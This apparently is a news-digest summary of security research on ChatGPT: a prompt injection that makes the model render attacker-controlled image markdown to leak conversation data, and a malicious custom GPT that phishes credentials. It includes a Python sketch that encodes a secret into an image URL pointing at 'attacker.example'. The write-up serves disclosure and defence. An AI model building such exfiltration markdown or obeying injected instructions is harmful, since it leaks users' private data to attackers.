December 22, 2023 at 05:39AM
Researchers discovered a vulnerability in ChatGPT that could be exploited via prompt injection to steal sensitive information: malicious content tricks the model into rendering attacker-controlled image markdown, and the resulting image request carries the data out. OpenAI partially addressed the issue in the web application but not in the mobile apps. Additionally, a custom GPT named 'The Thief' was created to phish for user credentials and exfiltrate the data to an external server.
Key takeaways:
– Researchers discovered a vulnerability in ChatGPT involving a prompt injection attack that uses markdown images, allowing attackers to steal sensitive information from users' conversations.
– OpenAI was informed of the attack method but initially did not plan to address it. It has since begun mitigating the issue in the web application, with ongoing efforts to improve security.
– Plus and Enterprise users of ChatGPT were given the ability to create custom GPTs, and a researcher created a malicious GPT named ‘The Thief’ that phishes for user credentials and exfiltrates the stolen data to an external server.
– The researcher demonstrated that such a malicious GPT could potentially be published on the official GPT Store, prompting OpenAI to implement safeguards against publishing obviously malicious GPTs.
These key takeaways summarize the security research findings and OpenAI’s response to the identified vulnerabilities.
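To make the exfiltration mechanism concrete, here is a minimal illustrative sketch of how stolen conversation text can be smuggled out through image markdown. The function name `build_exfil_markdown` and the domain `attacker.example` are placeholders invented for this example, not artifacts from the original research:

```python
from urllib.parse import quote

# Hypothetical sketch: "attacker.example" and build_exfil_markdown are
# illustrative names, not code from the actual attack.

def build_exfil_markdown(secret: str,
                         server: str = "https://attacker.example/log") -> str:
    """Embed stolen conversation text in an image URL's query string.

    If injected instructions get the model to emit this markdown, the
    client renders the "image", and the GET request it fires carries
    the secret to the attacker-controlled server.
    """
    return f"![loading]({server}?q={quote(secret)})"

# The rendered "image" silently requests a URL whose query string
# contains the percent-encoded secret.
payload = build_exfil_markdown("user password: hunter2")
```

This is why the mitigation matters on every client: blocking attacker-controlled image URLs in the web application does not help if the mobile apps still render them.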